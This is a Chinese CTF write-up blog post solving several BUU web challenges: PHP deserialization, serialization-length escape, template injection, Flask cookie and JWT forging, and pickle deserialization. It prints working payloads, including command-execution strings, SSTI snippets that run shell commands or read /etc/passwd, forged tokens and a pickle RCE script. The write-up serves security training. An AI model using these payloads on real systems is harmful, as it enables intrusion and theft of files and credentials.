<p>再次抓取，找到了这两个参数，看response发现是调用了函数，因此先想到了RCE。</p>
<p>但是system等函数被过滤了，<code>file_get_contents</code>被放了出来，读flag.php发现无，可能不在当前目录或者换名字了。</p>
<p>读一下php源码：</p>
<pre><code class="php+HTML">&lt;!DOCTYPE html&gt;
&lt;html&gt;
&lt;head&gt;
    &lt;title&gt;phpweb&lt;/title&gt;
    &lt;style type="text/css"&gt;
        body {
            background: url("bg.jpg") no-repeat;
            background-size: 100%;
        }
        p {
            color: white;
        }
    &lt;/style&gt;
&lt;/head&gt;

&lt;body&gt;
&lt;script language=javascript&gt;
    setTimeout("document.form1.submit()",5000)
&lt;/script&gt;
&lt;p&gt;
    &lt;?php
    $disable_fun = array("exec","shell_exec","system","passthru","proc_open","show_source","phpinfo","popen","dl","eval","proc_terminate","touch","escapeshellcmd","escapeshellarg","assert","substr_replace","call_user_func_array","call_user_func","array_filter", "array_walk",  "array_map","registregister_shutdown_function","register_tick_function","filter_var", "filter_var_array", "uasort", "uksort", "array_reduce","array_walk", "array_walk_recursive","pcntl_exec","fopen","fwrite","file_put_contents");
    function gettime($func, $p) {
        $result = call_user_func($func, $p);
        $a= gettype($result);
        if ($a == "string") {
            return $result;
        } else {return "";}
    }
    class Test {
        var $p = "Y-m-d h:i:s a";
        var $func = "date";
        function __destruct() {
            if ($this-&gt;func != "") {
                echo gettime($this-&gt;func, $this-&gt;p);
            }
        }
    }
    $func = $_REQUEST["func"];
    $p = $_REQUEST["p"];

    if ($func != null) {
        $func = strtolower($func);
        if (!in_array($func,$disable_fun)) {
            echo gettime($func, $p);
        }else {
            die("Hacker...");
        }
    }
    ?&gt;
&lt;/p&gt;
&lt;form  id=form1 name=form1 action="index.php" method=post&gt;
    &lt;input type=hidden id=func name=func value='date'&gt;
    &lt;input type=hidden id=p name=p value='Y-m-d h:i:s a'&gt;
&lt;/body&gt;
&lt;/html&gt;</code></pre>
<p>发现有条简单的链子，肯定可以反序列化，但是。。。直接RCE也行啊····</p>
<p>一个下划线就可以绕过了</p>
<pre><code>func=\system&amp;p=cat $(find / -name flag*)</code></pre><p>但是。。。BUU上不行，我也不知道为什么，查了一下之前确实可以233</p>
<p>那就老老实实搞链子吧，毕竟unserialize函数没有被禁，挺简单的，没什么过滤</p>
<p>payload：</p>
<pre><code>O:4:"Test":2:{s:1:"p";s:22:"cat /tmp/flagoefiu4r93";s:4:"func";s:6:"system";}</code></pre><h2 id="安洵杯-2019-easy-serialize-php"><a href="#安洵杯-2019-easy-serialize-php" class="headerlink" title="[安洵杯 2019]easy_serialize_php"></a>[安洵杯 2019]easy_serialize_php</h2><p><strong>难度：简单</strong></p>
<p><strong>考点：PHP反序列化</strong></p>
<p><strong>auto_append_file：</strong>其实有点像require(),这里点明了flag所在文件：d0g3_f1ag.php</p>
<p>1.auto_prepend_file—-指定在每个PHP页面执行前所要执行的代码。</p>
<p>2.auto_append_file—-指定在每个PHP页面执行完成后所要执行的代码。</p>
<ul>
<li>过滤函数filter()是对serialize($_SESSION)进行过滤，滤掉一些关键字 正常传img参数进去会被sha1加密，我们应该用别的方法控制$_SESSION中的参数。 本来挺好的序列化的字符串，按某种去掉了一些关键字，本身就不对，本身就涉及到可能破坏原有结构而无法正常反序列化的问题。这里是利用反序列化长度逃逸控制了img参数。之前有一道题目是关键字替换导致字符串长度变长，把后面的原有参数挤出去了， 本题是关键字被置空导致长度变短，后面的值的单引号闭合了前面的值的单引号，导致一些内容逃逸。。 extract后覆盖了两个没用的属性，但是后面又强制加了一个我们不可控的img属性</li>
</ul>
<p>利用截断构造payload对<code>d0g3_f1ag.php</code>进行读取:</p>
<pre><code>_SESSION[phpflag]=;s:7:"xxxxxxx";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}</code></pre><p>再读真正的flag位置：</p>
<pre><code>_SESSION[phpflag]=;s:14:"phpflagphpflag";s:7:"xxxxxxx";s:3:"img";s:20:"L2QwZzNfZmxsbGxsbGFn";}</code></pre><h2 id="0CTF-piapiapia"><a href="#0CTF-piapiapia" class="headerlink" title="0CTF piapiapia"></a>0CTF piapiapia</h2><p><strong>难度：中等</strong></p>
<p><strong>考点：PHP序列化逃逸</strong></p>
<h1 id="模板注入"><a href="#模板注入" class="headerlink" title="模板注入"></a>模板注入</h1><h2 id="The-mystery-of-ip"><a href="#The-mystery-of-ip" class="headerlink" title="The mystery of ip"></a>The mystery of ip</h2><p><strong>难度：易</strong></p>
<p><strong>考点：smarty SSTi</strong></p>
<p>简单注入，ls即可</p>
<p>来自王叹之师傅博客中的一张图</p>
<p><img src="https://img2018.cnblogs.com/blog/1625650/202002/1625650-20200216204049347-1844990197.png" alt="img"></p>
<h2 id=""><a href="#" class="headerlink" title=""></a></h2><h2 id="BJDCTF2020-Cookie-is-so-stable"><a href="#BJDCTF2020-Cookie-is-so-stable" class="headerlink" title="[BJDCTF2020]Cookie is so stable"></a>[BJDCTF2020]Cookie is so stable</h2><p><strong>难度：易</strong></p>
<p><strong>考点：Twig模板注入</strong></p>
<p>由于题目给了cookie提示，直接看cookie，只有：</p>
<pre><code class="http">Set-Cookie: user=1; expires=Wed, 26-Oct-2020 07:57:40 GMT; Max-Age=1800</code></pre>
<p>尝试注入，因为BJD之前出的都是模板注入，在<code>user</code>处输入<code>{{1*'2'}}</code>尝试一下，发现果然还是模板注入2333</p>
<p>给出一些模板注入的测试用例（<a href="https://websec.readthedocs.io/zh/latest/vuln/ssti.html）" target="_blank" rel="noopener">https://websec.readthedocs.io/zh/latest/vuln/ssti.html）</a></p>
<ul>
<li><p>简单的数学表达式，<code>{{ 7+7 }} =&gt; 14</code></p>
</li>
<li><p>字符串表达式 <code>{{ "ajin" }} =&gt; ajin</code></p>
</li>
<li><ul>
<li><p>Ruby</p>
<p><code>&lt;%= 7 * 7 %&gt;``&lt;%= File.open('/etc/passwd').read %&gt;</code></p>
</li>
</ul>
</li>
<li><ul>
<li><p>Java</p>
<p><code>${7*7}</code></p>
</li>
</ul>
</li>
<li><ul>
<li><p>Twig</p>
<p><code>{{7*'7'}}</code></p>
</li>
</ul>
</li>
<li><ul>
<li><p>Smarty</p>
<p><code>{php}echo</code>id<code>;{/php}</code></p>
</li>
</ul>
</li>
<li><ul>
<li><p>AngularJS</p>
<p><code>$eval('1+1')</code></p>
</li>
</ul>
</li>
<li><ul>
<li><p>Tornado</p>
<p>引用模块 <code>{% import module %}</code>=&gt; <code>{% import os %}{{ os.popen("whoami").read() }}</code></p>
</li>
</ul>
</li>
<li><ul>
<li><p>Flask/Jinja2</p>
<p><code>{{ config }}``{{ config.items() }}``{{get_flashed_messages.__globals__['current_app'].config}}``{{''.__class__.__mro__[-1].__subclasses__()}}``{{ url_for.__globals__['__builtins__'].__import__('os').system('ls') }}``{{ request.__init__.__globals__['__builtins__'].open('/etc/passwd').read() }}</code></p>
</li>
</ul>
</li>
<li><ul>
<li><p>Django</p>
<p><code>{{ request }}``{% debug %}``{% load module %}``{% include "x.html" %}``{% extends "x.html" %}</code></p>
</li>
</ul>
</li>
</ul>
<h1 id="Python"><a href="#Python" class="headerlink" title="Python"></a>Python</h1><h2 id="WesternCTF2018-shrine"><a href="#WesternCTF2018-shrine" class="headerlink" title="[WesternCTF2018]shrine"></a>[WesternCTF2018]shrine</h2><p><strong>难度：易</strong></p>
<p><strong>考点：SSTI模板注入，url_for</strong></p>
<p>过滤：</p>
<pre><code class="python">def safe_jinja(s): s = s.replace('(', '').replace(')', '') blacklist = ['config', 'self'] return ''.join(['{{% set {}=None%}}'.format(c) for c in blacklist]) + s</code></pre>
<p>绕过：<code>url_for</code></p>
<h2 id="Supercalc"><a href="#Supercalc" class="headerlink" title="Supercalc"></a>Supercalc</h2><hr>
<p><strong>难度：易</strong></p>
<p><strong>知识点：flask cookie伪造，flask session的安全问题</strong></p>
<p>先输入一个<code>1+1</code>看一下包，注意到了session：</p>
<pre><code>eyJoaXN0b3J5IjpbeyJjb2RlIjoiMSArIDEifV19.X4U6iA.oBstq0I1OScfmGf90WwDQ2ZJTDk</code></pre><p>有点像flask的。。。</p>
<p>解一下（leavesong）：</p>
<pre><code class="python">{'money': 9000, 'history': ['flag{23579e93-60f6-4ab2-b28c-b2118548ca9f}\n'], 'anti_tamper_hmac': '745fed2952b33f08eab8bee8db65a7e9'}//我不知道为什么会蹦出来picklestore里的flag·····
{'history': [{'code': '1 + 1'}]} //这个是应该有的</code></pre>
<p>反正继续做的话，应该是可以搞的，应该是继续伪造cookie</p>
<p>key应该还是要通过来获得，利用<code>#</code>注释来尝试一下：</p>
<pre><code>1/0#{{config}}</code></pre><p>果然找到了：</p>
<pre><code>SECRET_KEY&amp;#39;: &amp;#39;cded826a1e89925035cc05f0907855f7</code></pre><p>伪造cookie：</p>
<p><a href="https://github.com/noraj/flask-session-cookie-manager" target="_blank" rel="noopener">https://github.com/noraj/flask-session-cookie-manager</a>   注意在linux下</p>
<pre><code class="shell">root@kali:~/Desktop/flask-session-cookie-manager
python3 flask_session_cookie_manager3.py encode -s "cded826a1e89925035cc05f0907855f7" -t "{'history': [{'code': '__import__(\"os\").popen(\"cat flag.txt\").read()'}]}"                                                                 一开始我用的ls确定了是flag.txt            
</code></pre>
<p>伪造cookie重发即可，firefox中有自带重发以及preview，推荐</p>
<h2 id="CISCN2019-华北赛区-Day1-Web2-ikun"><a href="#CISCN2019-华北赛区-Day1-Web2-ikun" class="headerlink" title="[CISCN2019 华北赛区 Day1 Web2]ikun"></a>[CISCN2019 华北赛区 Day1 Web2]ikun</h2><p><strong>知识点：逻辑漏洞，cookie伪造，python反序列化</strong></p>
<p><strong>难度：中等</strong></p>
<p>登陆后是一个商城界面，发现视频下面写了：<code>==爆破*站：资金募集 11540.0==</code></p>
<p><code>==ikun们冲鸭,一定要买到lv6!!!==</code></p>
<p>所以我们是要买Lv6的产品，翻了几页没有看到，可以通过python脚本来查找。</p>
<p>我们发现相同等级的示意图是一样的，F12查看，发现图片的src就带有相应的等级。</p>
<p><img src="https://i.loli.net/2020/05/29/vIT8RqYujtwp3Nh.png" alt="CISCN华北ikun1.png"></p>
<p>用requests库查询即可带有lv6.png的页面即可</p>
<pre><code class="python">import requests
import time
for i in range(1,200):
    print(i)
    url = 'http://132bc261-1688-4891-be1e-dc1f5ff82988.node3.buuoj.cn/shop?page={}'.format(i)
    r = requests.get(url)
    if 'lv6.png' in r.text:
        print(i)
        print("bingo")
        break
    if r.status_code == 429: //BUU会有访问频率限制
        print("too fast")
        time.sleep(2)</code></pre>
<p>得到LV6在181页<img src="https://i.loli.net/2020/05/29/7Cwe6VTgivnZQya.png" alt="CISCN华北ikun2.png"></p>
<p>注册账号，发现钱只有1k，不够，从network看一下交易过程有没有可以操作的参数。</p>
<p>发现用了JWT的身份验证。</p>
<p>同时发现在提交的过程中传了一个discount参数为0.8，根据前面购物界面的<code>“-%20”</code>推测这是折扣的数值，那我们将其修改成一个极小值再重发就ok了。</p>
<p>但是提示：==该页面，只允许admin访问==，联系到前面的JWT，我们需要伪造admin身份。</p>
<blockquote>
<p>JSON Web Token（JWT）是一个非常轻巧的规范。这个规范允许我们使用JWT在用户和服务器之间传递安全可靠的信息。JWT常被用于前后端分离，可以和Restful API配合使用，常用于构建身份认证机制。</p>
</blockquote>
<p>JWT的数据格式分为三个部分： headers , payloads，signature(签名)，它们使用<code>.</code>点号分割。例如我这里的JWT为：<br>JWT与session的相同点是，它们都是存储用户信息；然而，Session是在服务器端的，而JWT是在客户端的。Session方式存储用户信息的最大问题在于要占用大量服务器内存，增加服务器的开销。而JWT方式将用户状态分散到了客户端中，可以明显减轻服务端的内存压力。Session的状态是存储在服务器端，客户端只有session id；而Token的状态是存储在客户端。</p>
<pre><code>eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6IlYxY3VuYSJ9.XkNYqo8PmtSXIH_24l03JPXv2wyidHfob_mUUPL-1UQ;</code></pre><p><img src="https://i.loli.net/2020/05/29/8hpsXDjLAVFgnrP.png" alt="Snipaste_2020-05-29_13-44-43.png"></p>
<p>解密得到上图</p>
<p><a href="https://github.com/brendan-rius/c-jwt-cracker" target="_blank" rel="noopener">c-jwt-crack</a>爆破一下密钥得<code>Secret is "1Kun"</code>，所以我们就可以伪造admin了</p>
<pre><code>eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIn0.40on__HQ8B2-wM1ZSwax3ivRK4j54jlaXv-1JjQynjo</code></pre><p>重发一下，F12，找到了<code>www.zip</code>下载下来发现是源码。</p>
<p>审计Admin.py</p>
<pre><code class="python">import tornado.web
from sshop.base import BaseHandler
import pickle
import urllib


class AdminHandler(BaseHandler):
    @tornado.web.authenticated
    def get(self, *args, **kwargs):
        if self.current_user == "admin":
            return self.render('form.html', res='This is Black Technology!', member=0)
        else:
            return self.render('no_ass.html')

    @tornado.web.authenticated
    def post(self, *args, **kwargs):
        try:
            become = self.get_argument('become')
            p = pickle.loads(urllib.unquote(become))
            return self.render('form.html', res=p, member=1)
        except:
            return self.render('form.html', res='This is Black Technology!', member=0)
</code></pre>
<p>我们注意到调用了pickle库，并且调用了<code>pickle.loads()</code>函数，而最后的<code>become</code>参数可控</p>
<p>EXP：</p>
<pre><code class="python">#python3.6.8
import pickle
import urllib.parse

class payload(object):
    def __reduce__(self):
       return (eval, ("open('/flag.txt','r').read()",))

a = pickle.dumps(payload())
s = urllib.parse.quote(a)
print (s)</code></pre>
<h2 id="PickleStore"><a href="#PickleStore" class="headerlink" title="PickleStore"></a>PickleStore</h2><p><strong>难度：中等</strong></p>
<p><strong>知识点：Pickle反序列化，cookie伪造，hmac验证</strong></p>
<p>看到pickle想到pickle反序列化，我们知道一般pickle序列化会出现在一些数据库和session储存过程中，这里没有任何数据库的信息。</p>
<p>和上一题差不多的思路，买一个，看一下cookie。（因为pickle反序列化一个利用是执行命令，另一个就是变量覆盖）</p>
<p>执行命令比较简单，就是反弹到内网靶机。</p>
<p>想试一下变量覆盖。</p>
<pre><code>gAN9cQAoWAUAAABtb25leXEBTeoBWAcAAABoaXN0b3J5cQJdcQNYFQAAAFl1bW15IHN0YW5kYXJkIHBpY2tsZXEEYVgQAAAAYW50aV90YW1wZXJfaG1hY3EFWCAAAAAzNWUyYWM5ZmNlNDMzMTQ2MjAyZTlhMDNiMzE5N2Y3YXEGdS4=</code></pre><p>直接base解不出来，python先转base再转pickle得到：</p>
<pre><code class="python">{'money': 490, 'history': ['Yummy standard pickle'], 'anti_tamper_hmac': '35e2ac9fce433146202e9a03b3197f7a'}</code></pre>
<p>这里发现有hmac验证，写个示例代码</p>
<pre><code class="python">import hmac
message = b'Hello, world!'
key = b'secret'
h = hmac.new(key, message, digestmod='MD5')
# 如果消息很长，可以多次调用h.update(msg)
h.hexdigest()
&gt;&gt;  'fa4ee7d173f2d97ee79022d1a7355bcf'</code></pre>
<p>如果要覆盖，覆盖什么呢？当然是有用的但是现在未知的，对，就是这个key，有了它，我们就能进行伪造。具体可以看</p>
<p><a href="https://xz.aliyun.com/t/7320" target="_blank" rel="noopener">https://xz.aliyun.com/t/7320</a></p>
<p><strong>但是其实的确是讨巧的，因为这里需要key所代表的变量名，结果恰好就是默认的key，如果换个<code>s3cret_k3y</code>变量就不能成功了。正经方法还是上马</strong></p>
<script>
        document.querySelectorAll('.github-emoji')
          .forEach(el => {
            if (!el.dataset.src) { return; }
            const img = document.createElement('img');
            img.style = 'display:none !important;';
            img.src = el.dataset.src;
            img.addEventListener('error', () => {
              img.remove();
              el.style.color = 'inherit';
              el.style.backgroundImage = 'none';
              el.style.background = 'none';
            });
            img.addEventListener('load', () => {
              img.remove();
            });
            document.body.appendChild(img);
          });
      </script>
            </div>
            <hr/>

            

    <div class="reprint" id="reprint-statement">
        
            <div class="reprint__author">
                <span class="reprint-meta" style="font-weight: bold;">
                    <i class="fas fa-user">
                        文章作者:
                    </i>
                </span>
                <span class="reprint-info">
                    <a href="/about" rel="external nofollow noreferrer">V1cuna</a>
                </span>
            </div>
            <div class="reprint__type">
                <span class="reprint-meta" style="font-weight: bold;">
                    <i class="fas fa-link">
                        文章链接:
                    </i>
                </span>
                <span class="reprint-info">
                    <a href="https://www.hackyangtuo.top/posts/ab7.html">https://www.hackyangtuo.top/posts/ab7.html</a>
                </span>
            </div>
            <div class="reprint__notice">
                <span class="reprint-meta" style="font-weight: bold;">
                    <i class="fas fa-copyright">
                        版权声明:
                    </i>
                </span>
                <span class="reprint-info">
                    本博客所有文章除特別声明外，均采用
                    <a href="https://creativecommons.org/licenses/by/4.0/deed.zh" rel="external nofollow noreferrer" target="_blank">CC BY 4.0</a>
                    许可协议。转载请注明来源
                    <a href="/about" target="_blank">V1cuna</a>
                    !
                </span>
            </div>
        
    </div>

    <script async defer>
      document.addEventListener("copy", function (e) {
        let toastHTML = '<span>复制成功，请遵循本文的转载规则</span><button class="btn-flat toast-action" onclick="navToReprintStatement()" style="font-size: smaller">查看</a>';
        M.toast({html: toastHTML})
      });

      function navToReprintStatement() {
        $("html, body").animate({scrollTop: $("#reprint-statement").offset().top - 80}, 800);
      }
    </script>



            <div class="tag_share" style="display: block;">
                <div class="post-meta__tag-list" style="display: inline-block;">
                    
                        <div class="article-tag">
                            
                                <a href="/tags/CTF/">
                                    <span class="chip bg-color">CTF</span>
                                </a>
                            
                                <a href="/tags/WP/">
                                    <span class="chip bg-color">WP</span>
                                </a>
                            
                                <a href="/tags/BUU/">
                                    <span class="chip bg-color">BUU</span>
                                </a>
                            
                        </div>
                    
                </div>
                <div class="post_share" style="zoom: 80%; width: fit-content; display: inline-block; float: right; margin: -0.15rem 0;">
                    <link rel="stylesheet" type="text/css" href="https://cdn.jsdelivr.net/gh/V1cuna/v1cuna.github.io/libs/share/css/share.min.css">
<div id="article-share">

    
    <div class="social-share" data-sites="twitter,facebook,google,qq,qzone,wechat,weibo,douban,linkedin" data-wechat-qrcode-helper="<p>微信扫一扫即可分享！</p>"></div>
    <script src="https://cdn.jsdelivr.net/gh/V1cuna/v1cuna.github.io/libs/share/js/social-share.min.js"></script>
    

    

</div>

                </div>
            </div>
            
        </div>
    </div>

    

    

    

    

    

    

    

<article id="prenext-posts" class="prev-next articles">
    <div class="row article-row">
        
        <div class="article col s12 m6" data-aos="fade-up">
            <div class="article-badge left-badge text-color">
                <i class="fas fa-chevron-left"></i>&nbsp;上一篇</div>
            <div class="card">
                <a href="/posts/8df7.html">
                    <div class="card-image">
                        
                        
                        <img src="https://cdn.jsdelivr.net/gh/V1cuna/v1cuna.github.io/medias/featureimages/14.jpg" class="responsive-img" alt="Recording of Life">
                        
                        <span class="card-title">Recording of Life</span>
                    </div>
                </a>
                <div class="card-content article-content">
                    <div class="summary block-with-text">
                        
                            没啥，就是记记杂事，非技术
有的东西不过很久是不可能理解的，有的东西等到理解了又为时已晚，大多数时候，我们不得不 在尚未清楚认识自己的情况下选择行动，因而感到迷惘和困惑。
十分感谢身边志同道合的朋友，真的让我感受到和一个人学习的不一样。虽然
                        
                    </div>
                    <div class="publish-info">
                        <span class="publish-date">
                            <i class="far fa-clock fa-fw icon-date"></i>2120-12-12
                        </span>
                        <span class="publish-author">
                            
                            <i class="fas fa-user fa-fw"></i>
                            V1cuna
                            
                        </span>
                    </div>
                </div>
                
                <div class="card-action article-tags">
                    
                    <a href="/tags/%E9%9A%8F%E7%AC%94/">
                        <span class="chip bg-color">-随笔</span>
                    </a>
                    
                </div>
                
            </div>
        </div>
        
        
        <div class="article col s12 m6" data-aos="fade-up">
            <div class="article-badge right-badge text-color">
                下一篇&nbsp;<i class="fas fa-chevron-right"></i>
            </div>
            <div class="card">
                <a href="/posts/7f16.html">
                    <div class="card-image">
                        
                        
                        <img src="https://cdn.jsdelivr.net/gh/V1cuna/v1cuna.github.io/medias/featureimages/4.jpg" class="responsive-img" alt="BUU-crypto">
                        
                        <span class="card-title">BUU-crypto</span>
                    </div>
                </a>
                <div class="card-content article-content">
                    <div class="summary block-with-text">
                        
                            
        document.querySelectorAll('.github-emoji')
          .forEach(el => {
            if (!el.dataset.src) { return
                        
                    </div>
                    <div class="publish-info">
                            <span class="publish-date">
                                <i class="far fa-clock fa-fw icon-date"></i>2020-11-05
                            </span>
                        <span class="publish-author">
                            
                            <i class="fas fa-user fa-fw"></i>
                            V1cuna
                            
                        </span>
                    </div>
                </div>
                
                <div class="card-action article-tags">
                    
                    <a href="/tags/CTF/">
                        <span class="chip bg-color">CTF</span>
                    </a>
                    
                    <a href="/tags/WP/">
                        <span class="chip bg-color">WP</span>
                    </a>
                    
                    <a href="/tags/BUU/">
                        <span class="chip bg-color">BUU</span>
                    </a>
                    
                    <a href="/tags/crypto/">
                        <span class="chip bg-color">crypto</span>
                    </a>
                    
                </div>
                
            </div>
        </div>
        
    </div>
</article>

</div>



<!-- 代码块功能依赖 -->
<script type="text/javascript" src="https://cdn.jsdelivr.net/gh/V1cuna/v1cuna.github.io/libs/codeBlock/codeBlockFuction.js"></script>

<!-- 代码语言 -->

<script type="text/javascript" src="https://cdn.jsdelivr.net/gh/V1cuna/v1cuna.github.io/libs/codeBlock/codeLang.js"></script>


<!-- 代码块复制 -->

<script type="text/javascript" src="https://cdn.jsdelivr.net/gh/V1cuna/v1cuna.github.io/libs/codeBlock/codeCopy.js"></script>


<!-- 代码块收缩 -->

<script type="text/javascript" src="https://cdn.jsdelivr.net/gh/V1cuna/v1cuna.github.io/libs/codeBlock/codeShrink.js"></script>


<!-- 代码块折行 -->

<style type="text/css">
code[class*="language-"], pre[class*="language-"] { white-space: pre !important; }
</style>


    </div>
    <div id="toc-aside" class="expanded col l3 hide-on-med-and-down">
        <div class="toc-widget">
            <div class="toc-title"><i class="far fa-list-alt"></i>&nbsp;&nbsp;目录</div>
            <div id="toc-content"></div>
        </div>
    </div>
</div>

<!-- TOC 悬浮按钮. -->

<div id="floating-toc-btn" class="hide-on-med-and-down">
    <a class="btn-floating btn-large bg-color">
        <i class="fas fa-list-ul"></i>
    </a>
</div>


<script src="https://cdn.jsdelivr.net/gh/V1cuna/v1cuna.github.io/libs/tocbot/tocbot.min.js"></script>
<script>
    $(function () {
        tocbot.init({
            tocSelector: '#toc-content',
            contentSelector: '#articleContent',
            headingsOffset: -($(window).height() * 0.4 - 45),
            collapseDepth: Number('0'),
            headingSelector: 'h2, h3, h4'
        });

        // modify the toc link href to support Chinese.
        let i = 0;
        let tocHeading = 'toc-heading-';
        $('#toc-content a').each(function () {
            $(this).attr('href', '#' + tocHeading + (++i));
        });

        // modify the heading title id to support Chinese.
        i = 0;
        $('#articleContent').children('h2, h3, h4').each(function () {
            $(this).attr('id', tocHeading + (++i));
        });

        // Set scroll toc fixed.
        let tocHeight = parseInt($(window).height() * 0.4 - 64);
        let $tocWidget = $('.toc-widget');
        $(window).scroll(function () {
            let scroll = $(window).scrollTop();
            /* add post toc fixed. */
            if (scroll > tocHeight) {
                $tocWidget.addClass('toc-fixed');
            } else {
                $tocWidget.removeClass('toc-fixed');
            }
        });

        
        /* 修复文章卡片 div 的宽度. */
        let fixPostCardWidth = function (srcId, targetId) {
            let srcDiv = $('#' + srcId);
            if (srcDiv.length === 0) {
                return;
            }

            let w = srcDiv.width();
            if (w >= 450) {
                w = w + 21;
            } else if (w >= 350 && w < 450) {
                w = w + 18;
            } else if (w >= 300 && w < 350) {
                w = w + 16;
            } else {
                w = w + 14;
            }
            $('#' + targetId).width(w);
        };

        // 切换TOC目录展开收缩的相关操作.
        const expandedClass = 'expanded';
        let $tocAside = $('#toc-aside');
        let $mainContent = $('#main-content');
        $('#floating-toc-btn .btn-floating').click(function () {
            if ($tocAside.hasClass(expandedClass)) {
                $tocAside.removeClass(expandedClass).hide();
                $mainContent.removeClass('l9');
            } else {
                $tocAside.addClass(expandedClass).show();
                $mainContent.addClass('l9');
            }
            fixPostCardWidth('artDetail', 'prenext-posts');
        });
        
    });
</script>

    

</main>




    <footer class="page-footer bg-color">
    
    <div class="container row center-align" style="margin-bottom: 0px !important;">
        <div class="col s12 m8 l8 copy-right">
            Copyright&nbsp;&copy;
            <span id="year">2019</span>
            <a href="/about" target="_blank">V1cuna</a>
            |&nbsp;Powered by&nbsp;<a href="https://hexo.io/" target="_blank">Hexo</a>
            |&nbsp;Theme&nbsp;<a href="https://github.com/blinkfox/hexo-theme-matery" target="_blank">Matery</a>
            <br>
            
            
            
            
            
            
            <span id="busuanzi_container_site_pv">
                |&nbsp;<i class="far fa-eye"></i>&nbsp;总访问量:&nbsp;<span id="busuanzi_value_site_pv"
                    class="white-color"></span>&nbsp;次
            </span>
            
            
            <span id="busuanzi_container_site_uv">
                |&nbsp;<i class="fas fa-users"></i>&nbsp;总访问人数:&nbsp;<span id="busuanzi_value_site_uv"
                    class="white-color"></span>&nbsp;人
            </span>
            
            <br>
            
            <br>
            
        </div>
        <div class="col s12 m4 l4 social-link social-statis">
    <a href="https://github.com/V1cuna" class="tooltipped" target="_blank" data-tooltip="访问我的GitHub" data-position="top" data-delay="50">
        <i class="fab fa-github"></i>
    </a>



    <a href="mailto:842731085@qq.com" class="tooltipped" target="_blank" data-tooltip="邮件联系我" data-position="top" data-delay="50">
        <i class="fas fa-envelope-open"></i>
    </a>







    <a href="tencent://AddContact/?fromId=50&fromSubId=1&subcmd=all&uin=842731085" class="tooltipped" target="_blank" data-tooltip="QQ联系我: 842731085" data-position="top" data-delay="50">
        <i class="fab fa-qq"></i>
    </a>







    <a href="/atom.xml" class="tooltipped" target="_blank" data-tooltip="RSS 订阅" data-position="top" data-delay="50">
        <i class="fas fa-rss"></i>
    </a>

</div>
    </div>
</footer>

<div class="progress-bar"></div>


    <!-- 搜索遮罩框 -->
<div id="searchModal" class="modal">
    <div class="modal-content">
        <div class="search-header">
            <span class="title"><i class="fas fa-search"></i>&nbsp;&nbsp;搜索</span>
            <input type="search" id="searchInput" name="s" placeholder="请输入搜索的关键字"
                   class="search-input">
        </div>
        <div id="searchResult"></div>
    </div>
</div>

<script src="https://cdn.jsdelivr.net/gh/V1cuna/v1cuna.github.io/js/search.js"></script>
<script type="text/javascript">
$(function () {
    searchFunc("https://cdn.jsdelivr.net/gh/V1cuna/v1cuna.github.io/search.xml", 'searchInput', 'searchResult');
});
</script>

    <!-- 回到顶部按钮 -->
<div id="backTop" class="top-scroll">
    <a class="btn-floating btn-large waves-effect waves-light" href="#!">
        <i class="fas fa-arrow-up"></i>
    </a>
</div>


    <script src="https://cdn.jsdelivr.net/gh/V1cuna/v1cuna.github.io/libs/materialize/materialize.min.js"></script>
    <script src="https://cdn.jsdelivr.net/gh/V1cuna/v1cuna.github.io/libs/masonry/masonry.pkgd.min.js"></script>
    <script src="https://cdn.jsdelivr.net/gh/V1cuna/v1cuna.github.io/libs/aos/aos.js"></script>
    <script src="https://cdn.jsdelivr.net/gh/V1cuna/v1cuna.github.io/libs/scrollprogress/scrollProgress.min.js"></script>
    <script src="https://cdn.jsdelivr.net/gh/V1cuna/v1cuna.github.io/libs/lightGallery/js/lightgallery-all.min.js"></script>
    <script src="https://cdn.jsdelivr.net/gh/V1cuna/v1cuna.github.io/js/matery.js"></script>

    <!-- Baidu Analytics -->

    <!-- Baidu Push -->

<script>
    (function () {
        var bp = document.createElement('script');
        var curProtocol = window.location.protocol.split(':')[0];
        if (curProtocol === 'https') {
            bp.src = 'https://zz.bdstatic.com/linksubmit/push.js';
        } else {
            bp.src = 'http://push.zhanzhang.baidu.com/push.js';
        }
        var s = document.getElementsByTagName("script")[0];
        s.parentNode.insertBefore(bp, s);
    })();
</script>

    
    <script src="https://cdn.jsdelivr.net/gh/V1cuna/v1cuna.github.io/libs/others/clicklove.js" async="async"></script>
    
    
    <script async src="https://cdn.jsdelivr.net/gh/V1cuna/v1cuna.github.io/libs/others/busuanzi.pure.mini.js"></script>
    

    

    

    

    

    

    
    <script src="https://cdn.jsdelivr.net/gh/V1cuna/v1cuna.github.io/libs/instantpage/instantpage.js" type="module"></script>
    

</body>

</html>
